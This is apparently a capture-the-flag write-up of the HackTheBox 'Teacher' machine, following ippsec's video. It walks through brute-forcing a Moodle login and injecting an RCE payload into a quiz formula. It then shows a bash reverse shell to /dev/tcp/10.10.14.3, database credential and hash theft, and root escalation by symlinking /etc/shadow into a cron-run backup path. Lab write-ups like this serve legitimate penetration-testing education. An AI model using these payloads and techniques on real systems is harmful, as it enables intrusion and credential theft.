Teacher Hackthebox

Disassembly of ippsec’s youtube video HackTheBox - Teacher. Box includes a web-app that is vulnerable to a php bug with allows for RCE. The usage of pspy to discover cron jobs and taking advantage of a root task that leads to root access.


Legal Usage: The information provided by [email protected] is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.


This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.

Enumeration

nmap scan:

1
nmap -sC -sV -oA nmap/teacher 10.10.10.153

(output)

1 port open which looks to be the web-server on port 80.

Investigate web-server

before continuing investigating site, start a dirbuster in the background as to always have something enumerating on the backend.

gobuster (background task)

1
gobuster -u http://10.10.10.153/ -w /usr/share/wordlists/dirbuster/directory-list-2.3.medium.txt -o gobuster-root.log -t 50

Return to web-server

Check out links and see if site gives out types of extensions to figure out what type of web-server it is and if code is being processed.

check out code for some css or static code:

images are tried to load an *onerror=*"*console.log*

back on webpage access console with F12:

console is reporting “That’s an F”

invesgating that 5.png

an error occurs as the image doesn’t seem to exist.

download 5.png locally

1
curl http://10.10.10.153/Images/5.png -o 5.png

Open file to investigate with xxd (hex editor):

1
xxd 5.png

check the contents

1
less 5.png

we have a partial password at this point.

find way into login to webapp

gobuster results:

check out /phpmyadmin

forbidden

Forbidden workaround via burp: Capture request and send to repeater

  • tactic modification of host: localhost

forbidden

  • tactic add X-Forwarded-For: localhost

check out link for more info: https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/

forbidden

In this example we could not bypass the 403 Forbidden.

check out /moodle

dynamically created page. In right corner we do see a “You are not logged in”.

attempt login with credentials/forgot password

first move to see if the forgot password will enumerate any further information remember that the actual message stated “ I forgot the last charachter of my password. The only part I remembered is Th4c00lTeacha.” But doesnt give a username.

Use forgot password to verify if a username is an account is valid.

says that if supplied a correct username or email then an email should have been sent to you.” Not very helpful with enumeration.

Login as guest:

guest can’t access user accounts.

Guessing the Username as Giovanni

Capture request with burp suite:

send to repeater:

There are no CRSF tokens which would stop from enumerating with wfuzz

enumerating password with wfuzz

1
wfuzz -u http://10.10.10.153/moodle/login/index.php -d 'anchor=&username=Giovanni&password=Th4C00lTeachaFUZZ' -w /usr/share/seclists/Fuzzing/special-chars.txt -hh 440

password enumerated as: Th4C00lTeacha#

Giovanni Captured

Login:

poke around server and nothing is of immediate interest. There is an upload under private files.

searchsploit moodle

1
searchsploit moodle

github moodle

Checking for any type of change log with issues addressed.

of the files there is a version.php which should be checked with the version of moodle on the target system.

from out target system only a blank page is returned.

enumerating moodle

google search: “moodle enumerate versions”

to check the moodle docs on page:

URL states that we are */34* version.

Google: moodle release notes to find date:

Released 13 November 2017

google search moodle exploit

search: “moodle exploit 3.4 3.5” as both version where missing from the searchsploit

ripstech blog offers a more detailed explanation as to how the exploit is going to function.

exploit explanation in a nutshell:

1
“There is en eval string within the `/question/question.php` which we turn an control the $formula and pass data straight to eval”

There is a metasploit module available but working manually work to create the exploit.

manually exploit moodle

On moodle web-app searching for a way to add a quiz:

Turn editing on under gear.

Add an activity:

save a template and edit to add question that will have a formula:

Using the ripstech block post if we enter the str we should get a “success”

1
$str= /*{a*/'$_GET[0]';//1.2};

in this situation changing the GET parameter to REQUEST

1
$str= /*{a*/'$_REQUEST[0]';//1.2};

submitted:

error regarding the semicolon, removed all semicolons and change the grade to 100%

(results)

formula seems to have been taken over at this point but has an error in syntax.

Searching around the question bank contains old questions from the creation of the box.

investigating creator formulas to discover exactly how they passed the request:

Modifying original request and adding information from our sample:

1
$str= /*{a*/'$_REQUEST[PleaseSubscribe]';//{x}};

resulted in the REQUEST being passed by the moodle web-app.

burp the REQUEST to RCE

Burp that exact request and sent to repeater and adding to send an ICMP packet:

1
...&PleaseSubscribe=ping+-c+1+10.10.14.3

setup tcpdump to capture the packet:

1
tcpdump -i tun0 -n icmp

-n = no dns resolution

packets are being sent from target equating to we have remote code execution (RCE) on the box.

Reverse Shell

Sending the reverse shell with the RCE

1
...&PleaseSubscribe=bash -i >& /dev/tcp/10.10.14.3/3001 0>&1 (highlight ctrl+u to  URL encode)

setup listener

1
ncat -lvnp 9001

execute and returns with a remote shell of box.

upgrade partial sell to ptty

1
2
3
4
5
python -c 'import pty:pty.spawn("/bin/bash")'
background with ctrl+z
stty -raw echo
fg (enter)
(enter)

enumerating the web-server

first things should consist of searching for the database and poking around it.

to search for database:

1
ls | grep config

checkout config.php

database credentials have been retrieved.

connect to mysql sever

1
mysql -u root -D moodle -p

Show tables and search for “user”:

1
show tables;

Show whats inside mdl_user:

1
describe mdl_user

show usernames and passwords:

1
select id,username,password from mdl_user;

we now have bcrypt hashes for a list of users and 1 that looks like an MD5 hash. The fastest way to decrypt MD5 hashes is simply with google.

Results:

1
2
username: Giovannibak
password: expelled

Priv-Esc

with a passwd check we have a user giovanni and switch users and enter newly acquired password.

1
2
3
cat /etc/passwd
su - giovanni
password: expelled

enumerating as giovanni

search the /work directory:

1
find . -ls

Check cron:

1
ls /etc/cron.*

there is a cron.d for php

1
cat /etc/cron.d/php

nothing here just a session cleanup. Every minute an event is occurring… which the cron could be under the root user which at this point there is no way to view that without a tool pspy.

download pspy: https://github.com/DominicBreuker/pspy

build pspy

1
1
GOOS=Linux GOARCH=amd64 go build

to download the extra packages

1
go get ..package..

rebuild:

1
1
GOOS=Linux GOARCH=amd64 go build

next were are going to send pspy to our target box with a simplehttpserver

target save location /dev/shm

1
wget 10.10.10.3:8000/pspy

execute, and now it is watching processes

pspy output:

now we now that */bin/sh* is running the backup.sh

investigating the backup.sh

1
ls -ls /usr/bin/backup.sh

read with less:

1
less /usr/bin/backup.sh

(sidenote) to be able to clear the screen we need to export $TERM

1
export TERM=xterm

disassembling the backup.sh

we know at this point were moving to /work tar’ing a file moving to /tmp tar’ing another fold and then chaning the chmod. If we can point the /tmp file to /etc/shadow we will be able to grab the hashes.

pointing a file at another file with ln:

1
ln -s /etc/shadow /home/giovanni/work/tmp

now after the cron is performed we can now control /etc/shadow

view shadow:

and now we can edit this file and change the root password to giovanni as we know what it is.

1
cat /etc/shadow | grep giovanni

now put it over the top of the root password:

Root&Loot

Switch users to root:

1
2
su -
password: expelled (giovonni that we just overwrote)

the loot


If you don’t know who ippsec is check him out at

Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Twitter: https://twitter.com/ippsec